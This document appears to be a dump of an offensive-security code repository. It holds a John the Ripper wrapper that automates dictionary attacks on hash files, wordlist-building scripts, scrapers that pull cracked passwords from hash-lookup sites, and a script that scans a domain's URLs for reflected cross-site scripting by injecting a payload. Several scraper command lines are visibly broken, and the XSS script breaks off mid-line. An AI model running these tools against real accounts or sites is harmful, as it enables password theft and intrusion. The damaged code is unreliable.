{ 61 | echo " " 62 | echo " /\ _|_ _ | _ |_ ._ " 63 | echo "/--\|_||_(_)\_|(_)| || |" 64 | echo " " 65 | } 66 | 67 | usage() { 68 | echo "Usage:" 69 | echo 70 | echo " ./autojohn.sh [--help|-h]" 71 | echo " show this help" 72 | echo 73 | echo " ./autojohn.sh --info" 74 | echo " show some information about dictionaries" 75 | echo 76 | echo " ./autojohn.sh " 77 | echo " list detected hash formats for file " 78 | echo 79 | echo " ./autojohn.sh []" 80 | echo " start cracking hashes with dictionary attack" 81 | echo " (warning: with rules like \"EXTRA\" or \"ALL\" it may take *ages*)" 82 | echo 83 | echo " ./autojohn.sh --sessions" 84 | echo " show sessions (both [F]inished and [R]unning)" 85 | echo 86 | echo " ./autojohn.sh --show " 87 | echo " show currently found passwords in session " 88 | echo 89 | echo " ./autojohn.sh --rules" 90 | echo " list available (optional) JohnTheRipper rules" 91 | echo 92 | echo " ./autojohn.sh --polish" 93 | echo " clean all the dictionaries by removing non-printable characters" 94 | echo " and DOS newlines (CR-LF) and finally by (unique-)sorting them" 95 | echo " (warning: depending on the size of the dictionaries, it may take" 96 | echo " a very long time and require a lot of temporary disk space)" 97 | echo 98 | echo " ./autojohn.sh --clean" 99 | echo " delete all files in pots directory (except CSV with passwords and" 100 | echo " stats) and the *.rec leftovers" 101 | echo 102 | 103 | exit 0 104 | } 105 | 106 | info() { 107 | DICT_NUM=$(find ${DICT_DIR}/*txt | wc -l | awk '{ print $1 }') 108 | DICT_SIZ=$(du -ch "${DU_A_PARAM}" ${DICT_DIR}/*txt | tail -1 | awk '{ print $1 }') 109 | 110 | echo "[+] Dictionaries directory: ${DICT_DIR}" 111 | echo "[+] Number of dictionaries: ${DICT_NUM}" 112 | echo "[+] Total dictionaries size: ${DICT_SIZ}" 113 | echo "[+] Pots directory: ${POTS_DIR}" 114 | echo 115 | 116 | exit 0 117 | } 118 | 119 | sessions() { 120 | N=$(find ${POTS_DIR}/*.pot 2> /dev/null | wc -l | awk '{ print $1 }') 121 | 122 | if [[ "${N}" -eq 0 ]] ; then 123 | echo "No sessions found (pots directory seems empty)." 124 | else 125 | for SESSION in $(find ${POTS_DIR}/*.pot | sed -r 's/.*\/(.*).pot.*/\1/') ; do 126 | if [[ -f "${POTS_DIR}/${SESSION}.progress" ]] ; then 127 | ps auxwww | grep john | grep -- "--session=${SESSION}" > /dev/null 128 | 129 | if [[ $? -ne 0 ]] ; then 130 | echo "[R] ${SESSION} (dead?)" 131 | else 132 | echo "[R] ${SESSION}" 133 | fi 134 | else 135 | echo "[F] ${SESSION}" 136 | fi 137 | done 138 | fi 139 | 140 | echo 141 | 142 | exit 0 143 | } 144 | 145 | rules() { 146 | john --list=rules | sort -h 147 | 148 | echo 149 | 150 | exit 0 151 | } 152 | 153 | polish() { 154 | export LC_CTYPE=C 155 | export LC_ALL=C 156 | 157 | MEMORY_USAGE="50%" # maximum memory usage for "sort" command (think before changing it!) 158 | CSV=${POTS_DIR}/polished_dicts.csv 159 | 160 | if [[ ! -w ${CSV} ]] ; then 161 | echo "FILENAME;START_TIME;END_TIME;OLD_SIZE;NEW_SIZE" > ${CSV} 162 | fi 163 | 164 | for DICT in $(ls -1Sr ${DICT_DIR}/*.txt) ; do 165 | BNDICT=$(basename "${DICT}") 166 | 167 | echo "[>] ${BNDICT}" 168 | 169 | STIME=$(date) 170 | OLDSIZE=$(du -h "${DU_A_PARAM}" "${DICT}" | awk '{ print $1 }') 171 | 172 | echo " Started at: ${STIME}" 173 | echo " Current size: ${OLDSIZE}" 174 | 175 | NEWDICT="${DICT}.NEW" 176 | 177 | tr -dc '[:print:]\n\r' < "${DICT}" > "${NEWDICT}" 178 | sleep 1 179 | dos2unix "${NEWDICT}" > /dev/null 2>&1 180 | sleep 1 181 | sort -S "${MEMORY_USAGE}" -u "${NEWDICT}" > "${DICT}" 2>&1 182 | sleep 1 183 | rm "${NEWDICT}" 184 | 185 | NEWSIZE=$(du -h "${DU_A_PARAM}" "${DICT}" | awk '{ print $1 }') 186 | ETIME=$(date) 187 | 188 | echo " New size: ${NEWSIZE}" 189 | echo " Finished at: ${ETIME}" 190 | echo "${BNDICT};${STIME};${ETIME};${OLDSIZE};${NEWSIZE}" >> ${CSV} 191 | echo 192 | done 193 | 194 | echo "Results can also be found in the following CSV file:" 195 | echo "${CSV}" 196 | echo 197 | 198 | exit 0 199 | } 200 | 201 | clean() { 202 | SCRIPT_DIR="$(cd $(dirname "$0") > /dev/null 2>&1 ; pwd -P)" 203 | rm -f ${SCRIPT_DIR}/*.rec 204 | 205 | find ${POTS_DIR} -type f -not -name 'polished_dicts.csv' -delete 206 | 207 | if [[ $? -eq 0 ]] ; then 208 | echo "Pots directory has been cleaned up." 209 | echo 210 | 211 | exit 0 212 | else 213 | echo "Error! Cannot clean pots directory: ${POTS_DIR}" 214 | echo 215 | 216 | exit 1 217 | fi 218 | } 219 | 220 | show() { 221 | SESSION=$1 222 | 223 | PRG_FILE=${POTS_DIR}/${SESSION}.progress 224 | CSV_FILE=${POTS_DIR}/${SESSION}.csv 225 | 226 | if [[ -f "${PRG_FILE}" ]] && [[ -s "${PRG_FILE}" ]] ; then # cracking is in progress 227 | echo "Found passwords in session \"${SESSION}\"": 228 | echo 229 | 230 | # not so elegant but it works... need something better btw! 231 | grep -e '(.*)' "${PRG_FILE}" | grep -v 'DONE (' | grep -v '^Loaded' | grep -v '^Node numbers' | sort -u 232 | 233 | echo 234 | elif [[ -f "${CSV_FILE}" ]] && [[ -s "${CSV_FILE}" ]] ; then # cracking has finished 235 | echo "Found passwords in session \"${SESSION}\"": 236 | echo 237 | 238 | sort -u "${CSV_FILE}" 239 | 240 | echo 241 | else 242 | echo "No passwords found (at the moment!) for session \"${SESSION}\"." 243 | echo 244 | fi 245 | } 246 | 247 | crack() { 248 | PARAMS_COUNT=$(echo "${PARAMS}" | wc -w) 249 | PARAMS_ARRAY=(${PARAMS}) 250 | 251 | if [[ "${PARAMS_COUNT}" -eq 1 ]] ; then 252 | FILE="${PARAMS_ARRAY[0]}" 253 | 254 | if [[ ! -f "${FILE}" ]] ; then 255 | echo "Error! Hashes file not found: ${FILE}" 256 | echo 257 | 258 | exit 1 259 | fi 260 | 261 | readarray -t FORMATS < <( 262 | { 263 | john --list=unknown "${FILE}" 2>&1 | awk -F\" '{ print $2 }' | sed -e 's/--format=//g' | sort -u | sed '/^$/d' 264 | john --list=unknown "${FILE}" 2>&1 | grep -F 'Loaded' | cut -d'(' -f2 | cut -d' ' -f1 | tr -d ',' 265 | }) 266 | 267 | if [[ ${#FORMATS[@]} -eq 0 ]] ; then 268 | echo "No valid hash formats detected!!! :-(" 269 | echo 270 | else 271 | echo "Detected hash formats:" 272 | echo 273 | 274 | FORMATS=($(echo ${FORMATS[@]} | tr ' ' '\n' | sort -u)) 275 | 276 | for F in "${FORMATS[@]}" ; do 277 | echo "- $F" 278 | done 279 | 280 | echo 281 | echo "Now, to start cracking, run:" 282 | echo "./autojohn.sh ${FILE} []" 283 | echo 284 | fi 285 | 286 | exit 0 287 | elif [[ "${PARAMS_COUNT}" -eq 3 || "${PARAMS_COUNT}" -eq 4 ]] ; then 288 | FILE="${PARAMS_ARRAY[0]}" 289 | FORMAT="${PARAMS_ARRAY[1]}" 290 | SESSION="${PARAMS_ARRAY[2]}" 291 | RULE="" 292 | 293 | if [[ "${PARAMS_COUNT}" -eq 4 ]] ; then 294 | RULE="${PARAMS_ARRAY[3]}" 295 | 296 | if [[ $(john --list=rules | grep -c -i -w "${RULE}") -eq 0 ]] ; then 297 | echo "Error! Rule does not exist: ${RULE}" 298 | echo 299 | 300 | exit 1 301 | fi 302 | fi 303 | 304 | if [[ ! -f "${FILE}" ]] ; then 305 | echo "Error! Hashes file not found: ${FILE}" 306 | echo 307 | 308 | exit 1 309 | fi 310 | 311 | if [[ ${FORMAT} == --* ]] ; then 312 | echo "Wrong value for : ${FORMAT}" 313 | echo 314 | 315 | exit 1 316 | fi 317 | 318 | if [[ ${SESSION} == --* ]] ; then 319 | echo "Wrong value for : ${SESSION}" 320 | echo 321 | 322 | exit 1 323 | fi 324 | 325 | POT_FILE=${POTS_DIR}/${SESSION}.pot 326 | PWD_FILE=${POTS_DIR}/${SESSION}.csv 327 | PROGRESS_FILE=${POTS_DIR}/${SESSION}.progress 328 | STATUS=$(john --show --pot="${POT_FILE}" --format="${FORMAT}" "${FILE}" | grep -F cracked) 329 | C=$(echo "${STATUS}" | grep -c -F ', 0 left') 330 | 331 | if [[ ${C} -eq 1 ]] ; then 332 | echo "All passwords already found! Exiting..." 333 | echo 334 | 335 | exit 0 336 | fi 337 | 338 | N=$(wc -l "${FILE}" | awk '{ print $1 }') 339 | SHA=$(shasum "${FILE}" | awk '{ print $1 }') 340 | BFILE=$(basename "${FILE}") 341 | 342 | cp "${FILE}" "${POTS_DIR}/${SESSION}_${BFILE}_${SHA}" 343 | 344 | echo "[+] Hashes file: $(readlink -f ${FILE})" 345 | echo "[+] Session name: ${SESSION}" 346 | echo "[+] Total hashes: ${N}" 347 | echo "[+] Hash format: ${FORMAT}" 348 | 349 | if [[ -z "${RULE}" ]] ; then 350 | echo "[+] Rule: *DEFAULT*" 351 | else 352 | echo "[+] Rule: ${RULE}" 353 | fi 354 | 355 | echo "[+] # of cores: ${CORES}" 356 | 357 | echo 358 | echo "===> Started at: $(date) <===" 359 | echo 360 | 361 | for DICT in $(ls -1 ${DICT_DIR}/*.txt) ; do 362 | BNDICT=$(basename "${DICT}") 363 | 364 | echo "[>] ${BNDICT}" 365 | 366 | if [[ -z "${RULE}" ]] ; then 367 | john --wordlist="${DICT}" --format="${FORMAT}" --nolog --fork="${CORES}" --session="${SESSION}" --pot="${POT_FILE}" "${FILE}" >> "${PROGRESS_FILE}" 2>&1 368 | else 369 | john --wordlist="${DICT}" --format="${FORMAT}" --nolog --fork="${CORES}" --session="${SESSION}" --pot="${POT_FILE}" --rules="${RULE}" "${FILE}" >> "${PROGRESS_FILE}" 2>&1 370 | fi 371 | 372 | STATUS=$(john --show --pot="${POT_FILE}" --format="${FORMAT}" "${FILE}" | grep -F cracked) 373 | echo "${STATUS}" 374 | 375 | C=$(echo "${STATUS}" | grep -c -F ', 0 left') 376 | 377 | if [[ ${C} -eq 1 ]] ; then 378 | echo 379 | echo "************************" 380 | echo "* Congratulations! *" 381 | echo "* All passwords found! *" 382 | echo "************************" 383 | 384 | break 385 | fi 386 | done 387 | 388 | echo 389 | echo "===> Finished at: $(date) <===" 390 | echo 391 | 392 | echo "--------------------------------------------------------------------------------" 393 | echo "Found passwords (saved in ${PWD_FILE}):" 394 | echo 395 | 396 | john --show --pot="${POT_FILE}" --format="${FORMAT}" "${FILE}" | grep -F ':' | sort -u | tee "${PWD_FILE}" 397 | 398 | NU=$(cat "${PWD_FILE}" | wc -l | awk '{ print $1 }') 399 | 400 | if [[ ${NU} -eq 0 ]] ; then 401 | echo "None :-(" 402 | 403 | rm -f "${PWD_FILE}" 404 | fi 405 | 406 | if [[ -f "${PROGRESS_FILE}" ]] ; then 407 | rm -f "${PROGRESS_FILE}" 408 | fi 409 | 410 | echo 411 | 412 | exit 0 413 | fi 414 | } 415 | 416 | 417 | # CHECKS ----------------------------------------------------------------------- 418 | 419 | declare -a CMDS=( 420 | "awk" 421 | "basename" 422 | "dos2unix" 423 | "john" 424 | "shasum" 425 | "tr" 426 | ); 427 | 428 | for CMD in ${CMDS[@]} ; do 429 | command_exists "${CMD}" 430 | done 431 | 432 | if [[ ! -d "${DICT_DIR}" ]] ; then 433 | echo "Error! Dictionaries directory not found: ${DICT_DIR}" 434 | 435 | exit 1 436 | else 437 | DICT_NUM=$(find ${DICT_DIR}/*.txt 2> /dev/null | wc -l) 438 | 439 | if [[ "${DICT_NUM}" -eq 0 ]] ; then 440 | echo "Error! No *.txt dictionaries found." 441 | 442 | exit 1 443 | fi 444 | fi 445 | 446 | if [[ ! -d "${POTS_DIR}" ]] ; then 447 | mkdir -p "${POTS_DIR}" 2> /dev/null 448 | 449 | if [[ "$?" -ne 0 ]] ; then 450 | echo "Error! Cannot create pots directory: ${POTS_DIR}" 451 | 452 | exit 1 453 | fi 454 | fi 455 | 456 | 457 | # MAIN ------------------------------------------------------------------------- 458 | 459 | logo 460 | 461 | if [[ "$#" -eq 0 ]] ; then 462 | usage 463 | fi 464 | 465 | PARAMS="" 466 | 467 | while (( "$#" )) ; do 468 | case "$1" in 469 | -h|--help) 470 | usage 471 | shift 472 | ;; 473 | --clean) 474 | clean 475 | shift 476 | ;; 477 | --info) 478 | info 479 | shift 480 | ;; 481 | --polish) 482 | polish 483 | shift 484 | ;; 485 | --rules) 486 | rules 487 | shift 488 | ;; 489 | --sessions) 490 | sessions 491 | shift 492 | ;; 493 | --show) 494 | if [ -n "$2" ] && [ "${2:0:1}" != "-" ] ; then 495 | show "$2" 496 | shift 2 497 | else 498 | echo "Error! Argument for $1 is missing." >&2 499 | echo 500 | 501 | exit 1 502 | fi 503 | ;; 504 | -*|--*=) # unsupported flags 505 | echo "Error! Unsupported flag: $1" >&2 506 | echo 507 | 508 | exit 1 509 | ;; 510 | *) # preserve positional arguments 511 | PARAMS="${PARAMS} $1" 512 | shift 513 | ;; 514 | esac 515 | done 516 | 517 | eval set -- "${PARAMS}" 518 | 519 | crack "${PARAMS}" 520 | -------------------------------------------------------------------------------- /Hacking/Password_Cracking/dict_split_n_sort.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: dict_split_n_sort.sh 6 | # 7 | # Description: This script takes a dictionary text file as input, reads all the 8 | # passwords in it and saves each password in a dedicated text file 9 | # depending on its first character. For example, all passwords 10 | # beginning with "a" will be saved in "a.txt", all passwords 11 | # beginning with "B" will be saved in "B.txt", and so on. 12 | # Password beginning with uncommon characters will be saved in a 13 | # file named "_others_.txt". 14 | # 15 | # Usage: ./dict_split_n_sort.sh 16 | # 17 | # 18 | # --TODO-- 19 | # - improve and optimize code 20 | # - better checks for command line parameters, files and strings 21 | # 22 | # 23 | ################################################################################ 24 | 25 | 26 | # VARIABLES -------------------------------------------------------------------- 27 | 28 | SORTED_OUT_DIR=~/DICTIONARIES/SORTED 29 | MEMORY_USAGE="50%" 30 | CORES=4 # it only works with the GNU implementation of sort 31 | 32 | 33 | # MAIN ------------------------------------------------------------------------- 34 | 35 | if [[ "$#" -eq 0 ]] ; then 36 | echo "Usage: dict_split_n_sort.sh " 37 | 38 | exit 1 39 | fi 40 | 41 | export LC_ALL=C 42 | export LC_CTYPE=C 43 | 44 | INFILE=$1 45 | 46 | if [[ ! -f "$INFILE" ]]; then 47 | echo "Dictionary file \"$INFILE\" doesn't exist!" 48 | 49 | exit 1 50 | fi 51 | 52 | DICT=$(readlink -f $INFILE) 53 | PWDS=$(wc -l $DICT | awk '{ print $1 }') 54 | SIZE=$(du -sh $DICT | awk '{ print $1 }') 55 | 56 | mkdir -p $SORTED_OUT_DIR 57 | 58 | echo "Dictionary: $DICT" 59 | echo "Passwords: $PWDS" 60 | echo "Size: $SIZE" 61 | echo "Output dir: $SORTED_OUT_DIR" 62 | echo 63 | echo "Splitting started at: $(date)" 64 | 65 | # splitting based on "A-Za-z0-9" characters 66 | for FIRSTCHAR in $(echo {A..Z} {a..z} {0..9}) ; do 67 | echo -n "${FIRSTCHAR} " 68 | OUTFILE=$SORTED_OUT_DIR/$FIRSTCHAR.txt 69 | grep "^${FIRSTCHAR}" $DICT >> $OUTFILE 70 | done 71 | 72 | # splitting based on all the other remaining characters 73 | OUTFILE=$SORTED_OUT_DIR/_others_.txt 74 | grep -v ^'[A-Za-z0-9]' $DICT >> $OUTFILE 75 | echo -n "_others_" 76 | echo 77 | 78 | echo "Splitting finished at: $(date)" 79 | echo 80 | echo "Sorting started at: $(date)" 81 | 82 | TOT=0 83 | 84 | for CHAR_DICT in $(ls -1 $SORTED_OUT_DIR/*.txt) ; do 85 | #sort --parallel=$CORES -S $MEMORY_USAGE -u $CHAR_DICT -o $CHAR_DICT 86 | sort -S $MEMORY_USAGE -u $CHAR_DICT -o $CHAR_DICT 87 | 88 | N=$(wc -l $CHAR_DICT | awk '{ print $1 }') 89 | TOT=$((TOT+N)) 90 | 91 | echo -ne "(${CHAR_DICT})\r" 92 | done 93 | 94 | echo "Sorting finished at: $(date)" 95 | echo 96 | echo "Total passwords: $TOT" 97 | -------------------------------------------------------------------------------- /Hacking/Password_Cracking/htmltable2csv.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # -*- coding: iso-8859-1 -*- 3 | # Hello, this program is written in Python - http://python.org 4 | programname = 'html2csv - version 2002-09-20 - http://sebsauvage.net' 5 | 6 | import sys, getopt, os.path, glob, HTMLParser, re 7 | 8 | try: import psyco ; psyco.jit() # If present, use psyco to accelerate the program 9 | except: pass 10 | 11 | def usage(progname): 12 | ''' Display program usage. ''' 13 | progname = os.path.split(progname)[1] 14 | if os.path.splitext(progname)[1] in ['.py','.pyc']: progname = 'python '+progname 15 | return '''%s 16 | A coarse HTML tables to CSV (Comma-Separated Values) converter. 17 | 18 | Syntax : %s source.html 19 | 20 | Arguments : source.html is the HTML file you want to convert to CSV. 21 | By default, the file will be converted to csv with the same 22 | name and the csv extension (source.html -> source.csv) 23 | You can use * and ?. 24 | 25 | Examples : %s mypage.html 26 | : %s *.html 27 | 28 | This program is public domain. 29 | Author : Sebastien SAUVAGE 30 | http://sebsauvage.net 31 | ''' % (programname, progname, progname, progname) 32 | 33 | class html2csv(HTMLParser.HTMLParser): 34 | ''' A basic parser which converts HTML tables into CSV. 35 | Feed HTML with feed(). Get CSV with getCSV(). (See example below.) 36 | All tables in HTML will be converted to CSV (in the order they occur 37 | in the HTML file). 38 | You can process very large HTML files by feeding this class with chunks 39 | of html while getting chunks of CSV by calling getCSV(). 40 | Should handle badly formated html (missing , , , 41 | extraneous , ...). 42 | This parser uses HTMLParser from the HTMLParser module, 43 | not HTMLParser from the htmllib module. 44 | Example: parser = html2csv() 45 | parser.feed( open('mypage.html','rb').read() ) 46 | open('mytables.csv','w+b').write( parser.getCSV() ) 47 | This class is public domain. 48 | Author: Sébastien SAUVAGE 49 | http://sebsauvage.net 50 | Versions: 51 | 2002-09-19 : - First version 52 | 2002-09-20 : - now uses HTMLParser.HTMLParser instead of htmllib.HTMLParser. 53 | - now parses command-line. 54 | To do: 55 | - handle
 tags
 56 |             - convert html entities (&name; and &#ref;) to Ascii.
 57 |             '''
 58 |     def __init__(self):
 59 |         HTMLParser.HTMLParser.__init__(self)
 60 |         self.CSV = ''      # The CSV data
 61 |         self.CSVrow = ''   # The current CSV row beeing constructed from HTML
 62 |         self.inTD = 0      # Used to track if we are inside or outside a ... tag.
 63 |         self.inTR = 0      # Used to track if we are inside or outside a ... tag.
 64 |         self.re_multiplespaces = re.compile('\s+')  # regular expression used to remove spaces in excess
 65 |         self.rowCount = 0  # CSV output line counter.
 66 |     def handle_starttag(self, tag, attrs):
 67 |         if   tag == 'tr': self.start_tr()
 68 |         elif tag == 'td': self.start_td()
 69 |     def handle_endtag(self, tag):
 70 |         if   tag == 'tr': self.end_tr()
 71 |         elif tag == 'td': self.end_td()         
 72 |     def start_tr(self):
 73 |         if self.inTR: self.end_tr()  #  implies 
 74 |         self.inTR = 1
 75 |     def end_tr(self):
 76 |         if self.inTD: self.end_td()  #  implies 
 77 |         self.inTR = 0            
 78 |         if len(self.CSVrow) > 0:
 79 |             self.CSV += self.CSVrow[:-1]
 80 |             self.CSVrow = ''
 81 |         self.CSV += '\n'
 82 |         self.rowCount += 1
 83 |     def start_td(self):
 84 |         if not self.inTR: self.start_tr() #  implies 
 85 |         self.CSVrow += '"'
 86 |         self.inTD = 1
 87 |     def end_td(self):
 88 |         if self.inTD:
 89 |             self.CSVrow += '",'  
 90 |             self.inTD = 0
 91 |     def handle_data(self, data):
 92 |         if self.inTD:
 93 |             self.CSVrow += self.re_multiplespaces.sub(' ',data.replace('\t',' ').replace('\n','').replace('\r','').replace('"','""'))
 94 |     def getCSV(self,purge=False):
 95 |         ''' Get output CSV.
 96 |             If purge is true, getCSV() will return all remaining data,
 97 |             even if  or  are not properly closed.
 98 |             (You would typically call getCSV with purge=True when you do not have
 99 |             any more HTML to feed and you suspect dirty HTML (unclosed tags). '''
100 |         if purge and self.inTR: self.end_tr()  # This will also end_td and append last CSV row to output CSV.
101 |         dataout = self.CSV[:]
102 |         self.CSV = ''
103 |         return dataout
104 | 
105 | if __name__ == "__main__":
106 |     try: # Put getopt in place for future usage.
107 |         opts, args = getopt.getopt(sys.argv[1:],None)
108 |     except getopt.GetoptError:
109 |         print usage(sys.argv[0])  # print help information and exit:
110 |         sys.exit(2)
111 |     if len(args) == 0:
112 |         print usage(sys.argv[0])  # print help information and exit:
113 |         sys.exit(2)       
114 |     print programname
115 |     html_files = glob.glob(args[0])
116 |     for htmlfilename in html_files:
117 |         outputfilename = os.path.splitext(htmlfilename)[0]+'.csv'
118 |         parser = html2csv()
119 |         print 'Reading %s, writing %s...' % (htmlfilename, outputfilename)
120 |         try:
121 |             htmlfile = open(htmlfilename, 'rb')
122 |             csvfile = open( outputfilename, 'w+b')
123 |             data = htmlfile.read(8192)
124 |             while data:
125 |                 parser.feed( data )
126 |                 csvfile.write( parser.getCSV() )
127 |                 sys.stdout.write('%d CSV rows written.\r' % parser.rowCount)
128 |                 data = htmlfile.read(8192)
129 |             csvfile.write( parser.getCSV(True) )
130 |             csvfile.close()
131 |             htmlfile.close()
132 |         except:
133 |             print 'Error converting %s        ' % htmlfilename
134 |             try:    htmlfile.close()
135 |             except: pass
136 |             try:    csvfile.close()
137 |             except: pass
138 |     print 'All done.'
139 | 


--------------------------------------------------------------------------------
/Hacking/Password_Cracking/pwd_sucker_crackpot.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | #
 3 | # Author:       Riccardo Mollo (riccardomollo84@gmail.com)
 4 | #
 5 | # Name:	        pwd_sucker_crackpot.sh
 6 | #
 7 | # Description:  A script that fetches cracked passwords from the following site:
 8 | #               http://cracker.offensive-security.com/index.php
 9 | #
10 | #
11 | # --TODO--
12 | # - ???
13 | #
14 | #
15 | ################################################################################
16 | 
17 | 
18 | # VARIABLES --------------------------------------------------------------------
19 | 
20 | URL="http://cracker.offensive-security.com/index.php"
21 | DICT_DIR=~/DICTIONARIES
22 | DICT=$DICT_DIR/CUSTOM_crackpot.txt
23 | 
24 | 
25 | # FUNCTIONS --------------------------------------------------------------------
26 | 
27 | command_exists() {
28 |     command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; }
29 | }
30 | 
31 | 
32 | # CHECKS -----------------------------------------------------------------------
33 | 
34 | declare -a CMDS=(
35 | "wget"
36 | );
37 | 
38 | for CMD in ${CMDS[@]} ; do
39 |     command_exists $CMD
40 | done
41 | 
42 | 
43 | # MAIN -------------------------------------------------------------------------
44 | 
45 | [[ $DEBUG -ne 0 ]] && set -x
46 | 
47 | OUT_HTML=$(echo /tmp/.rnd-${RANDOM}.html)
48 | TMP=/tmp/.crackpot.txt
49 | SDIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" >/dev/null 2>&1 && pwd)"
50 | 
51 | wget -O $OUT_HTML $URL > /dev/null 2>&1
52 | $SDIR/htmltable2csv.py $OUT_HTML > /dev/null 2>&1
53 | 
54 | OUT_CSV="$(echo $OUT_HTML | sed -e 's/html/csv/g')"
55 | 
56 | grep '^"[0-9]' $OUT_CSV | cut -d',' -f4 | sed 's/^"\(.*\)"$/\1/' | grep -v 'NOT-FOUND' > $TMP
57 | 
58 | cat $TMP >> $DICT
59 | sort -u $DICT -o $DICT
60 | 
61 | rm -f $OUT_HTML $OUT_CSV $TMP
62 | 


--------------------------------------------------------------------------------
/Hacking/Password_Cracking/pwd_sucker_gromweb.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | #
 3 | # Author:       Riccardo Mollo (riccardomollo84@gmail.com)
 4 | #
 5 | # Name:	        pwd_sucker_gromweb.sh
 6 | #
 7 | # Description:  A script that fetches cracked passwords from the following site:
 8 | #               https://md5.gromweb.com/
 9 | #
10 | #
11 | # --TODO--
12 | # - ???
13 | #
14 | #
15 | ################################################################################
16 | 
17 | 
18 | # VARIABLES --------------------------------------------------------------------
19 | 
20 | URL="https://md5.gromweb.com/"
21 | DICT_DIR=~/DICTIONARIES
22 | DICT=$DICT_DIR/CUSTOM_gromweb.txt
23 | 
24 | 
25 | # FUNCTIONS --------------------------------------------------------------------
26 | 
27 | command_exists() {
28 |     command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; }
29 | }
30 | 
31 | 
32 | # CHECKS -----------------------------------------------------------------------
33 | 
34 | declare -a CMDS=(
35 | "wget"
36 | );
37 | 
38 | for CMD in ${CMDS[@]} ; do
39 |     command_exists $CMD
40 | done
41 | 
42 | 
43 | # MAIN -------------------------------------------------------------------------
44 | 
45 | [[ $DEBUG -ne 0 ]] && set -x
46 | 
47 | OUT_HTML=$(echo /tmp/.rnd-${RANDOM}.html)
48 | 
49 | wget $URL -O $OUT_HTML
50 | cat $OUT_HTML | grep -F '> $DICT
51 | 
52 | sort -u $DICT -o $DICT
53 | 
54 | rm -f $OUT_HTML $OUT_CSV
55 | 


--------------------------------------------------------------------------------
/Hacking/Password_Cracking/pwd_sucker_hashkiller.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | #
 3 | # Author:       Riccardo Mollo (riccardomollo84@gmail.com)
 4 | #
 5 | # Name:	        pwd_sucker_hashkiller.sh
 6 | #
 7 | # Description:  A script that fetches cracked passwords from the following site:
 8 | #               https://hashkiller.co.uk/
 9 | #
10 | #
11 | # --TODO--
12 | # - ???
13 | #
14 | #
15 | ################################################################################
16 | 
17 | 
18 | # VARIABLES --------------------------------------------------------------------
19 | 
20 | URL="https://hashkiller.co.uk/"
21 | DICT_DIR=~/DICTIONARIES
22 | DICT=$DICT_DIR/CUSTOM_hashkiller.txt
23 | 
24 | 
25 | # FUNCTIONS --------------------------------------------------------------------
26 | 
27 | command_exists() {
28 |     command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; }
29 | }
30 | 
31 | 
32 | # CHECKS -----------------------------------------------------------------------
33 | 
34 | declare -a CMDS=(
35 | "wget"
36 | );
37 | 
38 | for CMD in ${CMDS[@]} ; do
39 |     command_exists $CMD
40 | done
41 | 
42 | 
43 | # MAIN -------------------------------------------------------------------------
44 | 
45 | [[ $DEBUG -ne 0 ]] && set -x
46 | 
47 | OUT_HTML=$(echo /tmp/.rnd-${RANDOM}.html)
48 | 
49 | wget $URL -O $OUT_HTML
50 | cat $OUT_HTML | grep -F '' | grep -vF '> $DICT
51 | 
52 | sort -u $DICT -o $DICT
53 | 
54 | rm -f $OUT_HTML $OUT_CSV
55 | 


--------------------------------------------------------------------------------
/Hacking/Password_Cracking/pwd_sucker_md5db.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | #
 3 | # Author:       Riccardo Mollo (riccardomollo84@gmail.com)
 4 | #
 5 | # Name:	        pwd_sucker_md5db.sh
 6 | #
 7 | # Description:  A script that fetches cracked passwords from the following site:
 8 | #               https://www.nitrxgen.net/md5db/
 9 | #
10 | #
11 | # --TODO--
12 | # - ???
13 | #
14 | #
15 | ################################################################################
16 | 
17 | 
18 | # VARIABLES --------------------------------------------------------------------
19 | 
20 | URL="https://www.nitrxgen.net/md5db/"
21 | DICT_DIR=~/DICTIONARIES
22 | DICT=$DICT_DIR/CUSTOM_md5db.txt
23 | 
24 | 
25 | # FUNCTIONS --------------------------------------------------------------------
26 | 
27 | command_exists() {
28 |     command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; }
29 | }
30 | 
31 | 
32 | # CHECKS -----------------------------------------------------------------------
33 | 
34 | declare -a CMDS=(
35 | "wget"
36 | );
37 | 
38 | for CMD in ${CMDS[@]} ; do
39 |     command_exists $CMD
40 | done
41 | 
42 | 
43 | # MAIN -------------------------------------------------------------------------
44 | 
45 | [[ $DEBUG -ne 0 ]] && set -x
46 | 
47 | OUT_HTML=$(echo /tmp/.rnd-${RANDOM}.html)
48 | 
49 | wget $URL -O $OUT_HTML
50 | cat $OUT_HTML | grep -F '
' -f5 | cut -d'<' -f1 >> $DICT 51 | 52 | sort -u $DICT -o $DICT 53 | 54 | rm -f $OUT_HTML $OUT_CSV 55 | -------------------------------------------------------------------------------- /Hacking/Penetration_Testing/find_reflected_xss.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: find_reflected_xss.sh 6 | # 7 | # Description: A script that, given a domain, tries to find URLs vulnerable to 8 | # Reflected Cross-Site Scripting (XSS) attacks. 9 | # 10 | # Usage: ./find_reflected_xss.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | DOMAIN=$1 23 | 24 | 25 | # MAIN ------------------------------------------------------------------------- 26 | 27 | DIR=$(mktemp -d -u --suffix="$DOMAIN") 28 | cd $DIR 29 | 30 | subfinder -d "$1" -o subs.txt 31 | cat subs.txt | httpx -o alive_subs.txt 32 | cat alive_subs.txt | waybackurls | tee wayback_urls.txt 33 | cat wayback_urls.txt | grep '=' | tee param_urls.txt 34 | cat param_urls.txt | grep '=' | qsreplace '">' | while read -r url ; do 35 | curl -s "$url" | grep -q 